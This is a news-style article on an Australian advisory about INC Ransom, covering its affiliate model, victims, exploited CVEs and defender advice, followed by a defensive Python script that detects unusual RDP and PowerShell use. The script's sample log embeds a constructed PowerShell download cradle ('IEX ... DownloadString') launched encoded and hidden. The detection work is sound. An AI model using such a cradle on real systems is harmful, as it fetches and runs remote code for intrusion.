When Australia's national cyber security agency issued a new advisory on INC Ransom, the global security community took notice. The attention was not because INC is a new entity, but because its affiliate-driven business model has made it one of the most persistent threats of 2025 against the infrastructure that society depends on to function.
The Australian Cyber Security Centre (ACSC), which operates under the Australian Signals Directorate (ASD), warned that INC Ransom's affiliate model is now enabling a diverse range of threat actors, who can launch attacks on critical infrastructure with little technical expertise of their own. The implications are substantial, because the sectors targeted include healthcare and government networks that underpin public safety and stability.
INC Ransom is categorized as a Ransomware-as-a-Service (RaaS) group, effectively functioning as a criminal franchise. In this model, core developers handle the creation and maintenance of the malware platform and then lease it to affiliates who perform the actual attacks, splitting the ransom rewards. This dark-web franchise approach allows for a diverse pool of perpetrators to inflict damage, with INC providing the technology while the affiliates conduct the break-ins.
By mid-2025, more than 200 victims were already cataloged on INC’s data leak site, and in July, INC earned the notorious distinction of being the most widely deployed ransomware based on reported victim incidents. This rapid ascension cannot be attributed to chance; it represents a strategically planned expansion, leveraged by affiliates who bring their access and skills from other hacking organizations.
The ACSC noted that healthcare organizations were disproportionately affected by INC's operations between January and August 2025, with educational institutions and government agencies also among the top sectors targeted. The advisory described specific tactics used by INC affiliates, such as using compromised accounts to gain initial access to Australian healthcare entities. Once inside, the affiliates escalate to administrative privileges and move laterally through the victim network, a well-worn intrusion pattern that succeeds because it relies on valid credentials and built-in tools rather than novel techniques.
In June, an incident involving the Tongan Ministry of Health highlighted the severity of the threat: the ransomware attack disrupted essential services across the country's national healthcare network. The ACSC confirmed that INC was responsible for this breach as well, a detail that speaks to the group's expanding geographical footprint and its targeting of institutions that serve public health.
Notably, INC affiliates do not need groundbreaking methods. Instead, they exploit known vulnerabilities in widely deployed enterprise software. Entry points cited include CVE-2023-3519, an unauthenticated remote code execution vulnerability in Citrix NetScaler ADC and Gateway, and CVE-2023-48788, a SQL injection flaw in Fortinet FortiClient EMS (Enterprise Management Server). Left unpatched, these vulnerabilities become gateways for affiliates, giving them access to critical systems without complex tradecraft.
Once inside a victim's network, INC affiliates follow a systematic playbook. They compress data before exfiltration, use AES encryption for secure communications, and send ransom notes to network printers so that they are prominently displayed. In the double-extortion model, they encrypt files and threaten to publish the stolen data if the ransom is not paid promptly.
In one high-profile breach, INC Ransom claimed to have infiltrated the Pennsylvania Office of the Attorney General in August 2025, allegedly exfiltrating over five terabytes of sensitive data and asserting that they had also accessed federal networks. This incident showcases the audacity of the group and the growing concern surrounding the security of government entities.
INC Ransom's reach extends well beyond U.S. borders, into the U.K. with high-profile targets such as Alder Hey Children's NHS Foundation Trust. Reports indicate that the group obtained large volumes of patient records and procurement data, reflecting a calculated strategy of targeting public-sector healthcare institutions that often operate under tight cybersecurity budgets.
Microsoft’s Threat Intelligence team has been tracking significant activity from INC affiliates, particularly a group identified as Vanilla Tempest, which pivoted to using INC Ransom as its primary payload. This adaptability among hacking groups evidences a fundamental characteristic of the RaaS model, where affiliates seek the most effective tools and readily adapt them in response to external pressures like law enforcement scrutiny.
In response to the escalating ransomware threat, Australia has introduced a regulatory framework that requires organizations with annual turnover above AU$3 million to report ransomware or extortion payments within 72 hours of making them. The measure aims to disrupt the financial incentives that sustain groups like INC Ransom and to give the government visibility into payments that were previously unreported.
To combat the evolving landscape of cyber threats, the ACSC has issued recommendations for network defenders. Key strategies include prioritizing the patching of internet-facing systems, implementing phishing-resistant multifactor authentication, segmenting networks to limit lateral movement, and monitoring for unusual usage patterns of legitimate administrative tools like PowerShell and Remote Desktop Protocol.
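The last of those recommendations, watching for unusual use of RDP and PowerShell, is the one most defenders struggle to turn into concrete logic, and it also covers the privilege escalation and lateral movement pattern the advisory describes earlier. The following Python script is an added illustration written for this page; it is not code from the ACSC advisory or from any INC analysis. It assumes a simplified pipe-separated rendering of Windows Security events (4624 logons and 4688 process creations), a hypothetical per-account RDP baseline, and a constructed sample log in which one account hops between several servers and then launches an encoded PowerShell command. The rules flag RDP logons outside the baseline, a burst of distinct RDP targets within a short window, and PowerShell launched with encoding, hidden-window or no-profile flags, decoding the encoded command so an analyst can see what was run.

```python
import base64
from collections import defaultdict
from datetime import datetime, timedelta

# Hypothetical baseline: which accounts are expected to RDP into which hosts.
# In a real deployment this would come from an asset inventory or PAM tool.
RDP_BASELINE = {
    "CORP\\svc-backup": {"SRV-BACKUP01"},
    "CORP\\jsmith": {"WS-JSMITH"},
}

# Constructed download cradle, encoded the way PowerShell expects (UTF-16LE, base64),
# so that the sample log line below decodes cleanly. Not a real observed command.
_DOWNLOAD_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
_ENCODED = base64.b64encode(_DOWNLOAD_CRADLE.encode("utf-16-le")).decode()

# Constructed sample events in a simplified, pipe-separated rendering of
# Windows Security log fields: timestamp|EventID|account|source IP|host|detail
SAMPLE_LOG = "\n".join([
    "2025-08-14T02:03:11|4624|CORP\\jsmith|10.1.50.21|WS-JSMITH|LogonType=10",
    "2025-08-14T02:05:40|4624|CORP\\jsmith|10.1.50.21|SRV-FILE01|LogonType=10",
    "2025-08-14T02:06:02|4624|CORP\\jsmith|10.1.50.21|SRV-DC01|LogonType=10",
    "2025-08-14T02:06:30|4624|CORP\\jsmith|10.1.50.21|SRV-SQL01|LogonType=10",
    "2025-08-14T02:07:15|4688|CORP\\jsmith|10.1.50.21|SRV-DC01|"
    "powershell.exe -nop -w hidden -EncodedCommand " + _ENCODED,
    "2025-08-14T09:15:00|4624|CORP\\svc-backup|10.1.10.5|SRV-BACKUP01|LogonType=10",
    "2025-08-14T09:20:00|4688|CORP\\svc-backup|10.1.10.5|SRV-BACKUP01|"
    "powershell.exe -File C:\\scripts\\backup.ps1",
])

ENCODED_FLAGS = {"-enc", "-encodedcommand", "-e", "-ec"}


def powershell_flags(cmdline):
    """Return the set of suspicious launch flags present in a PowerShell command line."""
    tokens = cmdline.lower().split()
    flags = set()
    for i, tok in enumerate(tokens):
        if tok in ENCODED_FLAGS:
            flags.add("encoded")
        elif tok in ("-nop", "-noprofile"):
            flags.add("noprofile")
        elif tok in ("-w", "-windowstyle") and i + 1 < len(tokens) and tokens[i + 1] == "hidden":
            flags.add("hidden")
    return flags


def decode_encoded_command(cmdline):
    """Decode the base64/UTF-16LE payload following -EncodedCommand, or None if absent/invalid."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        if tok.lower() in ENCODED_FLAGS and i + 1 < len(tokens):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze(log_text, baseline=RDP_BASELINE, window=timedelta(minutes=10), min_hosts=3):
    """Run the three detection rules over the log text and return a list of findings."""
    findings = []
    rdp_logons = defaultdict(list)  # account -> [(timestamp, host)]
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts_s, event_id, account, src, host, detail = line.split("|", 5)
        ts = datetime.fromisoformat(ts_s)
        # LogonType 10 is RemoteInteractive, i.e. an RDP session.
        if event_id == "4624" and "LogonType=10" in detail:
            rdp_logons[account].append((ts, host))
            if host not in baseline.get(account, set()):
                findings.append({"rule": "rdp_outside_baseline", "account": account,
                                 "host": host, "src": src, "ts": ts_s})
        elif event_id == "4688" and "powershell" in detail.lower():
            flags = powershell_flags(detail)
            if flags:
                finding = {"rule": "suspicious_powershell", "account": account,
                           "host": host, "flags": sorted(flags), "ts": ts_s}
                decoded = decode_encoded_command(detail)
                if decoded:
                    finding["decoded"] = decoded
                findings.append(finding)
    # Lateral-movement burst: one account reaching many distinct hosts over RDP quickly.
    for account, logons in rdp_logons.items():
        logons.sort()
        for i, (t0, _) in enumerate(logons):
            hosts = {h for t, h in logons[i:] if t - t0 <= window}
            if len(hosts) >= min_hosts:
                findings.append({"rule": "lateral_movement_burst", "account": account,
                                 "hosts": sorted(hosts), "window_start": t0.isoformat()})
                break
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f)
```

On the sample data the script reports three RDP logons outside the baseline, one lateral-movement burst for the same account, and one suspicious PowerShell launch with its decoded cradle; the service account's scheduled backup script produces nothing. Two practical caveats: event 4688 only carries the command line if "Include command line in process creation events" is enabled under Audit Process Creation, and the baseline is the part that needs real investment, since a rule like this is only as good as the inventory of who is expected to administer what.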
As INC Ransom continues to operate and expand its influence, it is crucial for cybersecurity professionals to remain vigilant. Notably, elements of INC’s operations have also been connected to the development of Lynx ransomware, indicating that the threat landscape may soon extend well beyond INC’s immediate branding. This evolution highlights that effectively neutralizing INC today may not prevent the emergence of new threats bearing similar characteristics tomorrow.

